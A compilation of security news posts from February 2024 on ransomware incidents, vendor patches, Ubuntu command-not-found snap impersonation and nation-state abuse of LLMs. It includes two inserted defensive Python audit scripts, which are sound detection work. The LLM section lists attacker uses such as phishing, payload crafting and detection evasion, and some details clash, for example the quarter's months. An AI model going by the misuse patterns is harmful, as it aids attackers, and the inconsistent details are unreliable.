
Ransomfeed – Third Quarter Report 2023 is out!

13 February 2024 at 11:47

Maintainers behind the Ransomfeed platform have released Q3 Report 2023 including activities of 185 criminal groups operating worldwide.

A comprehensive report delving into the intricate landscape of ransomware threats during the last four months of 2023 is out, with a meticulous focus on the monitoring activities conducted by the OSINT Ransomfeed platform (www.ransomfeed.it). Throughout this period, the platform diligently tracked 185 criminal groups operating worldwide, meticulously tracing 342 servers employed for ransomware activities. The data collected unearthed a total of 1771 ransomware claims, with 55 recorded incidents in Italy. This report meticulously scrutinizes the geographical localization of these attacks, as well as the industries predominantly targeted.

As is customary, the data below were gathered through the Ransomfeed platform's primary activity: periodic scraping of well-known dark web sites. This report focuses on the results collected for the third quarter of the past year, starting with a global overview of all monitored ransomware groups and ending with a specific focus on Italy.

During this period of 2023, the platform monitored 185 cybercriminal groups operating with ransomware technologies across more than 342 servers and mirrors, for a total of 1771 ransomware claims identified globally.

[Figure: Ransomfeed Q3 2023 ransomware statistics]

The months of May, June, July, and August each presented unique challenges in the realm of cybersecurity. Remarkably, December emerged as the most prolific month of the four months with 484 attacks, closely trailed by November with 482, September with 458, and October with 347. Notably, the year’s end witnessed an escalation in criminal claims, almost akin to concluding a productive year. Let us now delve into the detailed breakdown of the days.

This report offers an exhaustive account of ransomware threats in the third quarter of 2023, spotlighting activities monitored by the OSINT Ransomfeed platform.

In conclusion, the report underscores the paramount importance of international collaboration and the adoption of advanced defense strategies to effectively counter the burgeoning phenomenon of ransomware threats and safeguard the integrity of data and information systems.

Ransomfeed trusts that this report (the result of non-profit activity) will serve as a vital resource for cybersecurity professionals, researchers, and stakeholders alike, providing valuable insights into the evolving ransomware landscape and paving the way for robust defense mechanisms against such malicious activities.

The complete report is available here:

https://ransomfeed.it/data/reports/2023/DRM-Report-Q3-2023-%5BENG%5D.pdf

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, ransomware)

Bank of America customer data compromised after a third-party services provider data breach

13 February 2024 at 18:47

Bank of America revealed that the personal information of some customers was stolen in a data breach affecting a third-party services provider.

Bank of America began notifying some customers following a data breach at the third-party services provider Infosys McCamish System (IMS). The bank has sent notification letters to 57,000 customers, informing them that their personal information has been compromised.

Infosys disclosed the security breach on November 3, 2023. In a filing with the SEC, the company reported that it was the victim of a cyberattack that resulted in the non-availability of certain applications and systems.

McCamish immediately launched an investigation into the incident and worked on the remediation with the help of cybersecurity consultants.

The effects of the cyberattack described by the victim suggest it was targeted by a ransomware attack. On November 4, the LockBit ransomware gang claimed responsibility for the attack.

The company restored the impacted systems by December 31; it also estimated that the losses caused by the incident will be at least $30 million.

“On the basis of analysis conducted by the cybersecurity firm, McCamish believes that certain data was exfiltrated by unauthorized third parties during the incident and this exfiltrated data included certain customer data. McCamish has engaged a third-party e-discovery vendor in assessing the extent and nature of such data. This review process is ongoing. McCamish may incur additional costs including indemnities or damages/claims, which are indeterminable at this time.” reads the statement sent to the SEC. “Infosys had previously communicated the occurrence of this cybersecurity incident to BSE Limited, National Stock Exchange of India Limited, New York Stock Exchange and to United States Securities and Exchange Commission on November 3, 2023.”

On February 1, Bank of America started notifying 57,028 customers impacted by the data breach.

In a filing with the Maine Attorney General’s Office, Bank of America noted that it cannot determine “with certainty what personal information was accessed” during the attack.

“On or around November 3, 2023, IMS was impacted by a cybersecurity event when an unauthorized third party accessed IMS systems, resulting in the non-availability of certain IMS applications. On November 24, 2023, IMS told Bank of America that data concerning deferred compensation plans serviced by Bank of America may have been compromised. Bank of America’s systems were not compromised.” reads the letter sent to the impacted customers. “It is unlikely that we will be able to determine with certainty what personal information was accessed as a result of this incident at IMS. According to our records, deferred compensation plan information may have included your first and last name, address, business email address, date of birth, Social Security number, and other account information.”

According to the financial institution, exposed data may include first and last name, address, business email address, date of birth, Social Security number, and other account information.

Bank of America states that it is not aware of any misuse involving the compromised information; nevertheless, the bank will provide a complimentary two-year membership in an identity theft protection service provided by Experian IdentityWorks.


Pierluigi Paganini

(SecurityAffairs – Hacking, Bank of America) 

A ransomware attack took 100 Romanian hospitals down

13 February 2024 at 21:59

Authorities in Romania reported that at least 100 hospitals went offline after a ransomware attack hit the Hipocrate platform.

Authorities in Romania confirmed that a ransomware attack that targeted the Hipocrate Information System (HIS) has disrupted operations for at least 100 hospitals.

Hipocrate Information System (HIS) is a software suite designed to manage the medical and administrative activities of hospitals and other healthcare institutions.

The attack took place on February 11 and encrypted data in the production servers.

“During the night of February 11 to 12, 2024, a massive cyber ransomware attack took place on the production servers on which the HIS IT system runs. As a result of the attack, the system is down, files and databases are encrypted.” reported the Romanian Ministry of Health.

The initial number of impacted hospitals was 21, but later the authorities confirmed that the number had increased to 25. Another 79 hospitals took their systems down as a precautionary measure.

The Romanian Ministry of Health added that cybersecurity specialists, including experts from the National Cyber Security Directorate (DNSC), are monitoring the situation. The Romanian government also announced extraordinary preventive measures to prevent other hospitals from being impacted by the incident.

The DNSC reported that the ransomware operators employed a variant of the Phobos ransomware family known as Backmydata. The threat actors demand a payment of 3.5 BTC (about 157,000 euros).

“Hospitals using the HIPOCRATE platform, regardless of whether they were affected or not, have since yesterday received a series of recommendations from the DNSC to properly manage the situation” reported DNSC.

  • Identify affected systems and immediately isolate them from the rest of the network as well as from the Internet
  • Keep a copy of the ransom message and any other communications from the attackers. This information is useful to the authorities or for further analysis of the attack
  • Do not shut down the affected equipment. Stopping it will remove the evidence stored in the volatile memory (RAM)
  • Collect and keep all relevant log information, from the affected equipment but also from network equipment and firewalls
  • Examine the system logs to identify the mechanism by which IT infrastructure has been compromised
  • Immediately inform all employees and notify affected customers and business partners of the incident and its extent
  • Restore affected systems based on data backups after a full system cleanup has been performed. It is absolutely necessary to ensure that backups are intact, up-to-date and secure against attack
  • Ensure that all programs, applications and operating systems are updated to the latest versions and that all known vulnerabilities are patched

At this time, it is still unclear if the threat actors have stolen sensitive data from the impacted organizations.


Pierluigi Paganini

(SecurityAffairs – ransomware, Romanian hospitals) 

Microsoft Patch Tuesday for February 2024 fixed 2 actively exploited 0-days

14 February 2024 at 08:38

Microsoft Patch Tuesday security updates for February 2024 addressed 72 flaws, two of which are actively exploited in the wild.

Microsoft Patch Tuesday security updates for February 2024 resolved a total of 72 vulnerabilities, including two actively exploited zero-days.

The vulnerabilities affect Microsoft Windows and Windows Components; Office and Office Components; Azure; .NET Framework and ASP.NET; SQL Server; Windows Hyper-V; and Microsoft Dynamics.

Five vulnerabilities are rated Critical, 65 are rated Important, and two are rated Moderate in severity.

The two flaws actively exploited are:

CVE-2024-21412 (CVSS score 8.1) – Internet Shortcut Files Security Feature Bypass Vulnerability. An unauthenticated attacker can trigger the flaw by sending the victim a specially crafted file that is designed to bypass displayed security checks. The attacker has to trick the victims into clicking the file link. The flaw was reported by:

CVE-2024-21351 (CVSS score 7.6) – Windows SmartScreen Security Feature Bypass Vulnerability. An authorized attacker can trigger the flaw to bypass the SmartScreen user experience. The attacker can exploit the vulnerability by sending a malicious file to the user and convincing them to open it.

Below is the list of the critical flaws fixed by Microsoft Patch Tuesday security updates for February 2024.

[Image: table of the critical flaws fixed by Microsoft Patch Tuesday February 2024; not reproduced here]

As usual, the ZDI has published the full list of CVEs released by Microsoft for February 2024 here:

https://www.zerodayinitiative.com/blog/2024/2/13/the-february-2024-security-update-review


Pierluigi Paganini

(SecurityAffairs – ransomware, Patch Tuesday) 

Adobe Patch Tuesday fixed critical vulnerabilities in Magento, Acrobat and Reader

14 February 2024 at 09:25

Adobe Patch Tuesday security updates for February 2024 addressed more than 30 vulnerabilities in multiple products, including critical issues.

Adobe Patch Tuesday security updates released by Adobe addressed over 30 vulnerabilities across various products, including critical issues.

The software maker warned of critical flaws in popular products such as Adobe Acrobat and Reader, Adobe Commerce and Magento Open Source, Substance 3D Painter, and FrameMaker.

The company fixed 13 vulnerabilities in the Adobe Acrobat and Reader software, including arbitrary code execution, application denial of service and memory leak vulnerabilities.

“Adobe has released a security update for Adobe Acrobat and Reader for Windows and macOS. This update addresses critical and important vulnerabilities.” reads the advisory. “Successful exploitation could lead to arbitrary code execution, application denial-of-service, and memory leak.”

Below is the list of vulnerabilities addressed by the software vendor:

Vulnerability Category | Vulnerability Impact | Severity | CVSS base score | CVSS vector | CVE Number
Out-of-bounds Write (CWE-787) | Arbitrary code execution | Critical | 7.8 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | CVE-2024-20726
Out-of-bounds Write (CWE-787) | Arbitrary code execution | Critical | 7.8 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | CVE-2024-20727
Out-of-bounds Write (CWE-787) | Arbitrary code execution | Critical | 7.8 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | CVE-2024-20728
Use After Free (CWE-416) | Arbitrary code execution | Important | 7.8 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | CVE-2024-20729
Integer Overflow or Wraparound (CWE-190) | Arbitrary code execution | Critical | 7.8 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | CVE-2024-20730
Use After Free (CWE-416) | Arbitrary code execution | Critical | 8.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | CVE-2024-20731
Improper Input Validation (CWE-20) | Application denial-of-service | Important | 5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H | CVE-2024-20733
Use After Free (CWE-416) | Memory leak | Important | 5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N | CVE-2024-20734
Out-of-bounds Read (CWE-125) | Memory leak | Important | 5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N | CVE-2024-20735
Out-of-bounds Read (CWE-125) | Memory leak | Important | 5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N | CVE-2024-20736
Out-of-bounds Read (CWE-125) | Memory leak | Important | 5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N | CVE-2024-20747
Out-of-bounds Read (CWE-125) | Memory leak | Important | 5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N | CVE-2024-20748
Out-of-bounds Read (CWE-125) | Memory leak | Important | 5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N | CVE-2024-20749

Below is the list of vulnerabilities addressed by the software firm that impact Adobe Commerce and Magento Open Source products:

Vulnerability Category | Vulnerability Impact | Severity | Authentication required to exploit? | Exploit requires admin privileges? | CVSS base score | CVSS vector | CVE number(s)
Cross-site Scripting (Stored XSS) (CWE-79) | Arbitrary code execution | Critical | Yes | Yes | 9.1 | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H | CVE-2024-20719
Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) (CWE-78) | Arbitrary code execution | Critical | Yes | Yes | 9.1 | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H | CVE-2024-20720
Uncontrolled Resource Consumption (CWE-400) | Application denial-of-service | Important | Yes | Yes | 5.7 | CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:N/I:N/A:H | CVE-2024-20716
Cross-site Scripting (Stored XSS) (CWE-79) | Arbitrary code execution | Important | Yes | Yes | 5.4 | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N | CVE-2024-20717
Cross-Site Request Forgery (CSRF) (CWE-352) | Security feature bypass | Moderate | Yes | No | 4.3 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N | CVE-2024-20718

According to the advisory, the above vulnerabilities can be exploited only by an authenticated attacker.

“Exploit requires admin privileges: The vulnerability is (or is not) only exploitable by an attacker with administrative privileges.” states the advisory.

The good news is that the software vendor is not aware of attacks in the wild exploiting these vulnerabilities.



Pierluigi Paganini

(SecurityAffairs – ransomware, Patch Tuesday) 

Zoom fixed critical flaw CVE-2024-24691 in Windows software

14 February 2024 at 15:33

Zoom addressed seven vulnerabilities in its desktop and mobile applications, including a critical flaw (CVE-2024-24691) affecting the Windows software.

Video messaging giant Zoom released security updates to address seven vulnerabilities in its desktop and mobile applications, including a critical issue, tracked as CVE-2024-24691 (CVSS score of 9.6), in its Windows software.

The vulnerability CVE-2024-24691 is an improper input validation bug that could be exploited by an attacker with network access to escalate privileges.

“Improper input validation in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows may allow an unauthenticated user to conduct an escalation of privilege via network access.” reads the advisory.

The vulnerability impacts the following products:

  • Zoom Desktop Client for Windows before version 5.16.5
  • Zoom VDI Client for Windows before version 5.16.10 (excluding 5.14.14 and 5.15.12)
  • Zoom Rooms Client for Windows before version 5.17.0
  • Zoom Meeting SDK for Windows before version 5.16.5

The company also addressed a high-severity escalation of privilege vulnerability, tracked as CVE-2024-24697, impacting Windows software.

“Untrusted search path in some Zoom 32 bit Windows clients may allow an authenticated user to conduct an escalation of privilege via local access.” reads the advisory.

The issue impacts the following products:

  • Zoom Desktop Client for Windows before version 5.17.0
  • Zoom VDI Client for Windows before version 5.17.5 (excluding 5.15.15 and 5.16.12)
  • Zoom Meeting SDK for Windows before version 5.17.0
  • Zoom Rooms Client for Windows before version 5.17.0

The video messaging company also resolved a high-severity escalation of privilege defect in these Windows applications, noting that it can be exploited locally, without authentication.

Tracked as CVE-2024-24697 and described as an untrusted search path issue, the vulnerability impacts Desktop Client before version 5.17.0, VDI Client before version 5.17.5 (excluding 5.15.15 and 5.16.12), Meeting SDK before version 5.17.0, and Rooms Client before version 5.17.0.

Below is the complete list of the addressed issues:

ZSB | Title | Severity | CVE | Date Published | Date Updated
ZSB-24008 | Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows – Improper Input Validation | Critical | CVE-2024-24691 | 02/13/2024 | 02/13/2024
ZSB-24007 | Zoom Clients – Improper Input Validation | Medium | CVE-2024-24690 | 02/13/2024 | 02/13/2024
ZSB-24006 | Zoom Clients – Business Logic Error | Medium | CVE-2024-24699 | 02/13/2024 | 02/13/2024
ZSB-24005 | Zoom Clients – Improper Authentication | Medium | CVE-2024-24698 | 02/13/2024 | 02/13/2024
ZSB-24004 | Zoom Clients – Untrusted Search Path | High | CVE-2024-24697 | 02/13/2024 | 02/13/2024
ZSB-24003 | Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows – Improper Input Validation | Medium | CVE-2024-24696 | 02/13/2024 | 02/13/2024
ZSB-24002 | Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows – Improper Input Validation | Medium | CVE-2024-24695 | 02/13/2024 | 02/13/2024

It’s unclear whether any of the above vulnerabilities have been actively exploited in the wild.

Zoom recommends that users update their applications to the latest available releases as soon as possible.

In November 2023, the company fixed a critical vulnerability in Zoom Rooms that allowed threat actors to take over meetings and steal sensitive data.


Pierluigi Paganini

(SecurityAffairs – hacking, Zoom)

Abusing the Ubuntu ‘command-not-found’ utility to install malicious packages

14 February 2024 at 21:48

Researchers reported that attackers can exploit the ‘command-not-found’ utility to trick users into installing rogue packages on Ubuntu systems.

Cybersecurity researchers from cloud security firm Aqua discovered that the popular ‘command-not-found’ utility can be abused to produce deceptive recommendations of malicious packages.

“Aqua Nautilus researchers have identified a security issue that arises from the interaction between Ubuntu’s command-not-found package and the snap package repository.” reads the report published by Aqua. “While command-not-found serves as a convenient tool for suggesting installations for uninstalled commands, it can be inadvertently manipulated by attackers through the snap repository, leading to deceptive recommendations of malicious packages.”

The default Ubuntu installation includes the command-not-found package, which suggests packages to install when a user tries to run a command in Bash or Zsh that is not available on the system. The utility relies on the command_not_found_handle function, which Bash invokes when it encounters an unrecognized command.

The package provides recommendations for both APT and snap packages. For example, if a user tries to execute “ifconfig” and it’s not installed, the package will suggest installing “net-tools” through apt.

The utility uses a local database located at /var/lib/command-not-found/commands.db to link commands to their corresponding APT packages.

An attacker can claim the snap name associated with an APT package whose maintainers have not yet registered it, then upload a dummy “rogue” package under that name.

“The maintainers of the jupyter-notebook APT package had not claimed the corresponding snap name. This oversight left a window of opportunity for an attacker to claim it and upload a malicious snap named jupyter-notebook.” reads the analysis published by Aqua. “We can observe that the command-not-found utility suggests the snap package first, even before the original APT package. This behavior could potentially mislead users into installing the snap package.”

[Figure: command-not-found package attack]

Moreover, the researchers discovered that up to 26% of commands linked to APT (Advanced Package Tool) packages may be exposed to impersonation. This vulnerability could expose users to supply chain attacks impacting both Linux users and Windows systems running WSL.

The researchers also warn of typosquatting attacks: a user who mistypes a command (e.g., ifconfigg instead of ifconfig) may be offered a malicious snap package that an attacker has registered under the misspelled name.

“For instance, consider what could occur if a user accidentally types ifconfigg instead of ifconfig” continues the analysis. “the command-not-found package helpfully corrects the user, suggesting the net-tools package for the mistyped ifconfig command. However, the situation becomes more problematic when an attacker capitalizes on these common mistakes by registering a snap with the typo, such as ifconfigg.”

The potential for attackers to exploit the command-not-found utility by suggesting their rogue Snap packages is worrisome.

“It remains uncertain how extensively these capabilities have been exploited, underscoring the urgency for heightened vigilance and proactive defense strategies,” Aqua concludes.
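The audit below is an added example (not Aqua's tooling or Ubuntu's own code) showing, from the defender's side, how the two exposures described in this article can be checked on a command-to-package mapping: it uses a constructed stand-in for commands.db with an assumed, simplified schema and a constructed snapshot of registered snap names, then reports commands whose snap name is still unclaimed and registered snaps that collide with, or are one typo away from, a command APT already provides.

```python
"""Audit helper for the command-not-found / snap name-collision issue.

Added example. The database layout below is an assumption (a simplified
two-table stand-in for /var/lib/command-not-found/commands.db), and the snap
registry snapshot is constructed sample data, not a query against the store.
"""
import sqlite3
from typing import Dict, FrozenSet, List, Set, Tuple

# Constructed sample of command -> APT package mappings (stands in for commands.db).
SAMPLE_COMMANDS: List[Tuple[str, str]] = [
    ("ifconfig", "net-tools"),
    ("jupyter-notebook", "jupyter-notebook"),
    ("nmap", "nmap"),
    ("htop", "htop"),
]

# Constructed snapshot of registered snap names -> publisher (stands in for the snap store).
SAMPLE_SNAP_REGISTRY: Dict[str, str] = {
    "htop": "canonical-maintained",           # legitimate claim by the package's maintainers
    "jupyter-notebook": "unknown-publisher",  # name claimed by someone other than the maintainers
    "ifconfigg": "unknown-publisher",         # typosquat of ifconfig
}


def build_sample_db() -> sqlite3.Connection:
    """Create an in-memory database with the assumed simplified schema and load the sample."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE packages (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.execute("CREATE TABLE commands (pkg_id INTEGER NOT NULL, command TEXT NOT NULL)")
    for command, package in SAMPLE_COMMANDS:
        row = conn.execute("SELECT id FROM packages WHERE name = ?", (package,)).fetchone()
        pkg_id = row[0] if row else conn.execute(
            "INSERT INTO packages (name) VALUES (?)", (package,)).lastrowid
        conn.execute("INSERT INTO commands (pkg_id, command) VALUES (?, ?)", (pkg_id, command))
    conn.commit()
    return conn


def load_commands(conn: sqlite3.Connection) -> Dict[str, str]:
    """Return {command: apt_package} from the database."""
    rows = conn.execute(
        "SELECT c.command, p.name FROM commands c JOIN packages p ON p.id = c.pkg_id")
    return {command: package for command, package in rows}


def typo_variants(name: str) -> Set[str]:
    """One-edit typos of a command: doubled letter, dropped letter, swapped adjacent letters."""
    variants: Set[str] = set()
    for i in range(len(name)):
        variants.add(name[:i] + name[i] + name[i:])          # doubled letter (ifconfig -> ifconfigg)
        variants.add(name[:i] + name[i + 1:])                # dropped letter (ifconfig -> ifconfg)
        if i + 1 < len(name):
            variants.add(name[:i] + name[i + 1] + name[i] + name[i + 2:])  # transposition
    variants.discard(name)
    return variants


def unclaimed_snap_names(commands: Dict[str, str], snap_registry: Dict[str, str]) -> List[str]:
    """Commands whose snap name is still free: the impersonation exposure Aqua describes."""
    return sorted(cmd for cmd in commands if cmd not in snap_registry)


def suspicious_snaps(commands: Dict[str, str], snap_registry: Dict[str, str],
                     trusted_publishers: FrozenSet[str]) -> List[Tuple[str, str]]:
    """Registered snaps worth a second look, as (snap, reason) pairs:
    a name equal to an APT-provided command but published by an untrusted party,
    or a name one typo away from an APT-provided command."""
    findings: List[Tuple[str, str]] = []
    for snap, publisher in snap_registry.items():
        if snap in commands and publisher not in trusted_publishers:
            findings.append((snap, f"name collides with command from APT package {commands[snap]}"))
            continue
        for cmd in commands:
            if snap in typo_variants(cmd):
                findings.append((snap, f"typosquat of {cmd} (APT package {commands[cmd]})"))
                break
    return sorted(findings)


def audit(trusted_publishers: FrozenSet[str] = frozenset({"canonical-maintained"})) -> dict:
    """Run both checks against the constructed sample and return the findings."""
    commands = load_commands(build_sample_db())
    return {
        "unclaimed": unclaimed_snap_names(commands, SAMPLE_SNAP_REGISTRY),
        "suspicious": suspicious_snaps(commands, SAMPLE_SNAP_REGISTRY, trusted_publishers),
    }


if __name__ == "__main__":
    for key, value in audit().items():
        print(key, value)
```

Against a real system the two constructed inputs would be replaced by the local commands.db and a list of snap names of interest; the checks themselves do not change.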


Pierluigi Paganini

(SecurityAffairs – hacking, Ubuntu)

Nation-state actors are using AI services and LLMs for cyberattacks

15 February 2024 at 06:54

Microsoft and OpenAI warn that nation-state actors are using ChatGPT to automate some phases of their attack chains, including target reconnaissance and social engineering attacks.

Multiple nation-state actors are exploiting artificial intelligence (AI) and large language models (LLMs), including OpenAI ChatGPT, to automate their attacks and increase their sophistication.

According to a study conducted by Microsoft in collaboration with OpenAI, the two companies identified and disrupted operations conducted by five nation-state actors that abused their AI services to carry out their attacks.

The researchers observed the following APT groups using artificial intelligence (AI) and large language models (LLMs) in various phases of their attack chain:

“Language support is a natural feature of LLMs and is attractive for threat actors with continuous focus on social engineering and other techniques relying on false, deceptive communications tailored to their targets’ jobs, professional networks, and other relationships.” reads the report published by Microsoft. “Importantly, our research with OpenAI has not identified significant attacks employing the LLMs we monitor closely.”

The researchers pointed out that, at this time, the attackers have yet to use LLMs to devise novel attacks; the malicious uses of LLMs observed by the researchers include:

  • LLM-informed reconnaissance: Employing LLMs to gather actionable intelligence on technologies and potential vulnerabilities.
  • LLM-enhanced scripting techniques: Utilizing LLMs to generate or refine scripts that could be used in cyberattacks, or for basic scripting tasks such as programmatically identifying certain user events on a system and assistance with troubleshooting and understanding various web technologies.
  • LLM-aided development: Utilizing LLMs in the development lifecycle of tools and programs, including those with malicious intent, such as malware.
  • LLM-supported social engineering: Leveraging LLMs for assistance with translations and communication, likely to establish connections or manipulate targets.
  • LLM-assisted vulnerability research: Using LLMs to understand and identify potential vulnerabilities in software and systems, which could be targeted for exploitation.
  • LLM-optimized payload crafting: Using LLMs to assist in creating and refining payloads for deployment in cyberattacks.
  • LLM-enhanced anomaly detection evasion: Leveraging LLMs to develop methods that help malicious activities blend in with normal behavior or traffic to evade detection systems.
  • LLM-directed security feature bypass: Using LLMs to find ways to circumvent security features, such as two-factor authentication, CAPTCHA, or other access controls.
  • LLM-advised resource development: Using LLMs in tool development, tool modifications, and strategic operational planning.

Microsoft’s report details the use of LLMs by each APT group. For instance, the Iranian nation-state actor Crimson Sandstorm (CURIUM) used its AI services to generate various phishing emails, to generate code snippets, and to assist in developing code to evade detection.

OpenAI reported that the APT groups used its AI services to carry out the following tasks:

  • Charcoal Typhoon used our services to research various companies and cybersecurity tools, debug code and generate scripts, and create content likely for use in phishing campaigns.
  • Salmon Typhoon used our services to translate technical papers, retrieve publicly available information on multiple intelligence agencies and regional threat actors, assist with coding, and research common ways processes could be hidden on a system.
  • Crimson Sandstorm used our services for scripting support related to app and web development, generating content likely for spear-phishing campaigns, and researching common ways malware could evade detection.
  • Emerald Sleet used our services to identify experts and organizations focused on defense issues in the Asia-Pacific region, understand publicly available vulnerabilities, help with basic scripting tasks, and draft content that could be used in phishing campaigns.
  • Forest Blizzard used our services primarily for open-source research into satellite communication protocols and radar imaging technology, as well as for support with scripting tasks.

Microsoft announced principles shaping Microsoft’s policy and actions mitigating the risks associated with the abuse of its AI services by nation-state actors, advanced persistent manipulators (APMs), and cybercriminal syndicates.

The principles include Identification and action against malicious threat actors’ use, Notification to other AI service providers, Collaboration with other stakeholders, and Transparency.


Pierluigi Paganini

(SecurityAffairs – AI services, OpenAI ChatGPT)

CISA adds Microsoft Windows bugs to its Known Exploited Vulnerabilities catalog

15 February 2024 at 10:04

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds 2 Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:

  • CVE-2024-21412 Microsoft Windows Internet Shortcut Files Security Feature Bypass Vulnerability
  • CVE-2024-21351 Microsoft Windows SmartScreen Security Feature Bypass Vulnerability

This week, Microsoft released Patch Tuesday security updates for February 2024 that resolved a total of 72 vulnerabilities, including the above vulnerabilities that are actively exploited in the wild.

Below are the details of the two vulnerabilities:

CVE-2024-21412 (CVSS score 8.1) – Internet Shortcut Files Security Feature Bypass Vulnerability. An unauthenticated attacker can trigger the flaw by sending the victim a specially crafted file that is designed to bypass displayed security checks. The attacker has to trick the victims into clicking the file link. The flaw was reported by:

CVE-2024-21351 (CVSS score 7.6) – Windows SmartScreen Security Feature Bypass Vulnerability. An authorized attacker can trigger the flaw to bypass the SmartScreen user experience. The attacker can exploit the vulnerability by sending a malicious file to the user and convincing them to open it.

Trend Micro researchers reported that the flaw CVE-2024-21412 was used in a zero-day attack chain by the APT group Water Hydra.

A new vulnerability discovered by @thezdi was used in a zero-day attack chain by the APT group Water Hydra.

Watch Trend Micro Sr. Threat Researcher @gothburz share his expert insights on CVE-2024-21412. pic.twitter.com/AZasBtG2Ot

— Trend Micro Research (@TrendMicroRSRCH) February 13, 2024

The popular researcher Will Dormann speculates that CVE-2024-21412 results from the partial fix of the vulnerability CVE-2023-36025. The fix for CVE-2023-36025 didn’t consider the case where a .URL file points to a .URL file, Dormann explained.

Ah, so it looks like CVE-2024-21412 is to address a bypass for CVE-2023-36025, which was the fact that remote targets inside of a ZIP didn't get SmartScreen love. The fix for CVE-2023-36025 didn't consider the case where a .URL file points to a .URL file.https://t.co/SLpw0L7mtY pic.twitter.com/x3lskKmBRi

— Will Dormann (@wdormann) February 13, 2024
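The check below is an added example (not Microsoft's, Trend Micro's or Dormann's code) that turns the .URL-points-to-.URL chain described in the Patch Tuesday write-up above and in Dormann's thread into a triage rule for Internet Shortcut files: a shortcut whose target is itself a .url file on a remote host is flagged for review before a user opens it. The shortcut contents, file names and hosts are constructed samples using documentation addresses.

```python
"""Triage of Windows Internet Shortcut (.url) files that chain to another .url file.

Added example. A .url file is an INI-style text file with an [InternetShortcut]
section and a URL= key; this parser flags shortcuts whose target is a remote
.url file, the case the CVE-2023-36025 fix reportedly did not cover.
"""
import configparser
from typing import Dict, List, Optional

# Constructed sample shortcut contents (not real samples). Hosts use documentation ranges.
SAMPLES: Dict[str, str] = {
    "meeting-notes.url": "[InternetShortcut]\nURL=https://example.com/notes\n",
    "invoice.url": "[InternetShortcut]\nURL=https://example.org/files/invoice.url\n",
    "share-link.url": "[InternetShortcut]\nURL=\\\\203.0.113.5\\share\\next.url\n",   # UNC target
    "remote-file.url": "[InternetShortcut]\nURL=file://203.0.113.5/pub/link.url\n",  # file:// with host
    "local.url": "[InternetShortcut]\nURL=file:///C:/Users/Public/readme.url\n",     # local chain
    "broken.url": "[Other]\nName=nothing here\n",                                    # not a shortcut
}

REMOTE_SCHEMES = {"http", "https", "ftp", "webdav"}


def parse_target(text: str) -> Optional[str]:
    """Return the URL= value of the [InternetShortcut] section, or None if absent/unparsable."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    if not cp.has_section("InternetShortcut"):
        return None
    return cp.get("InternetShortcut", "URL", fallback=None)  # option lookup is case-insensitive


def is_remote(target: str) -> bool:
    """True when the target resolves to another host: UNC path, web scheme, or file:// with a host."""
    t = target.strip()
    if t.startswith("\\\\") or t.startswith("//"):
        return True  # UNC path such as \\host\share\file
    scheme, sep, rest = t.partition(":")
    if not sep:
        return False
    scheme = scheme.lower()
    if scheme in REMOTE_SCHEMES:
        return True
    if scheme == "file":
        # file://host/share is remote; file:///C:/... (empty host) is local
        return rest.startswith("//") and not rest.startswith("///")
    return False


def points_to_url_file(target: str) -> bool:
    """True when the target path (ignoring query/fragment) ends in .url."""
    path = target.strip().lower().split("?")[0].split("#")[0]
    return path.endswith(".url")


def classify(text: str) -> dict:
    """Describe one shortcut: its target, whether it chains to a .url, whether that is remote."""
    target = parse_target(text)
    chained = target is not None and points_to_url_file(target)
    remote = target is not None and is_remote(target)
    return {"target": target, "chained": chained, "remote": remote, "flag": chained and remote}


def triage(samples: Dict[str, str]) -> List[str]:
    """Names of shortcuts that chain to a remote .url file and should be held for review."""
    return sorted(name for name, text in samples.items() if classify(text)["flag"])


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, classify(text))
    print("flagged:", triage(SAMPLES))
```

A shortcut that chains to a local .url is reported as chained but not flagged; tighten that if your environment never legitimately uses nested shortcuts.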

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the Catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix these vulnerabilities by March 5, 2024.


Pierluigi Paganini

